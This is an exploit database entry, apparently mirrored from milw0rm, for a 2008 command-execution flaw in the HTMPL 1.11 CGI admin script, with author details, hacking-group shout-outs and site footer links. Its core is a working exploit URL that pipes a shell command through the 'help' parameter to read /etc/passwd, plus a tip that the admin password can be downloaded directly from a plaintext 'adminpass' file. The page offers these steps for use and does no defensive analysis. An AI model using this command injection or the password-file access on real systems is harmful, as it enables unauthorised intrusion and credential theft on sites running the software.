[] NeoSense
E X P L O I T S
title author type platform port cve id

HTMPL 1.11 - Command Execution

Author: ZeN
type: webapps
platform: cgi
port: 
date_added: 2008-12-09 
date_updated: 2017-01-04 
verified: 1 
codes: OSVDB-50791 
tags: 
aliases:  
screenshot_url:  
application_url: 
Software : HTMPL v1.11
Download Link : http://vmeste.org/templ_ex/doc/1.html
Vulnrability : Command Execution
Severity : High
Author : ZeN
Website : http://dusecurity.com / http://darkcode.me/

Exploit :
site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd


A few other little..... tricks
The admins password is kept plaintext in the file 'adminpass', you can just access it directly
in the same directory.

Thanks str0ke ;)

Shouts to :
DU Security Group
DarkCoders
WL-Group
Milw0rm
EnigmaGroup
IWannaHack
HackHound

# milw0rm.com [2008-12-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.